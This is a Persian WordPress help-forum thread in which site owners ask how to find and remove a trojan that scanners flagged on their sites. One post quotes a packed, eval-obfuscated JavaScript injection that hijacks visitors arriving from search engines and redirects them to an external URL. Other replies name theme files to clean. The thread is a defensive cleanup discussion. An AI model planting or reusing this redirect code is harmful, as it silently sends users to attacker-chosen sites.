انجمن


وجود تروجان در سایت  (۹ نوشته)

  • samin

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۳
    تشکر شده: ۲ بار
    # نوشته شده: ۹ سال پیش
    ۷ اسفند ۱۳۹۰ - ۱۶:۰۳

    قصد تبلیغات در گوگل را داشتم که اعلام شد سایت من حاوی تروجان می باشد.
    از کجا می شه فهمید کجای سایت آلوده شده تا پاک بشه .
    لطفا راهنمایی کنید.

  • Araz

    آفلاین
    کاربر فعال
    تعداد نوشته‌ها: ۱۵۰۴
    تشکر شده: ۹۱۰ بار
    # نوشته شده: ۹ سال پیش
    ۷ اسفند ۱۳۹۰ - ۲۱:۰۴

    از این آدرس استفاده کنید.
    البته پیدا کردن چنین سایت هایی در اینترنت چندان هم سخت و دشوار نیست.

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    علی سجاد - samin
  • viera2

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۲
    تشکر شده: ۱ بار
    # نوشته شده: ۹ سال پیش
    ۷ اسفند ۱۳۹۰ - ۲۲:۱۶

    سلام
    برای من هم چنین مشکلی پیش آمده
    یکی از دوستانم گفت که هنگام باز کردن سایت آنتی ویروس نود ایراد میگیره
    وقتی سایتم رو بوسیله http://sitecheck.sucuri.net/scanner چک کردم میگه کد زیر وجود داره :
    <div class="cl">&nbsp;</div><!--scounter--><script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script> </div>

    باید چکار کنم ؟
    آدرس سایتم : http://blog.bakhtiari.in

  • omid0098

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۳۵۳
    تشکر شده: ۱۱۹۴ بار
    # نوشته شده: ۹ سال پیش
    ۷ اسفند ۱۳۹۰ - ۲۳:۱۹

    سلام
    به فایل فانکشن قالبتون برید و کدهای زیر رو حذف کنید.
    موفق باشید

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    samin
  • viera2

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۲
    تشکر شده: ۱ بار
    # نوشته شده: ۹ سال پیش
    ۷ اسفند ۱۳۹۰ - ۲۳:۳۱

    من مجبور شدن کل فایل های وردپرس رو پاک کنم و با بک آپ دیتا بیس اون رو دوباره نصب کنم . خدارو شکر درست شد

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    milad200
  • samin

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۳
    تشکر شده: ۲ بار
    # نوشته شده: ۹ سال پیش
    ۹ اسفند ۱۳۹۰ - ۰۸:۱۳

    http://www.aroospaytakht.com
    ویروس کش نود سایت رو ویروسی می شناسه
    بالاخره نفهمیدم از کجا بفهمم کجای سایتم مشکل داره ؟
    راهنمایی کنید.

  • Araz

    آفلاین
    کاربر فعال
    تعداد نوشته‌ها: ۱۵۰۴
    تشکر شده: ۹۱۰ بار
    # نوشته شده: ۹ سال پیش
    ۹ اسفند ۱۳۹۰ - ۱۱:۱۱

    mohamadinia گفت:
    http://www.aroospaytakht.com
    ویروس کش نود سایت رو ویروسی می شناسه
    بالاخره نفهمیدم از کجا بفهمم کجای سایتم مشکل داره ؟
    راهنمایی کنید.

    مشکلی درسایت شما مشاهده نمی شود.

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    samin
  • mosafer_khaste_70

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱
    # نوشته شده: ۹ سال پیش
    ۱۳ اردیبهشت ۱۳۹۱ - ۲۱:۲۷

    سلام من سایتم ویروس داره
    با فایرفکس یا اکسپلورر ک میرم ی هشدار میده بهم
    من ک نمیتونم بفهمم مشکلش کجاست لطفا راهنمایی کنید

    http://www.fk-patoogh.ir
    va
    blog.fk-patoogh.ir

    لطفا اگه میشه جوابشو برام میل کنید

  • Araz

    آفلاین
    کاربر فعال
    تعداد نوشته‌ها: ۱۵۰۴
    تشکر شده: ۹۱۰ بار
    # نوشته شده: ۹ سال پیش
    ۱۴ اردیبهشت ۱۳۹۱ - ۰۱:۳۰

    محتوای فایل های:

    function.php
    single.php
    footer.php
    index.php

    را از وجود کدهای اسکریپت اشاره شده در بالا و یا مشابه آن چک کنید.

درباره‌ی این موضوع



برچسب‌ها

هیچ برچسبی نیست.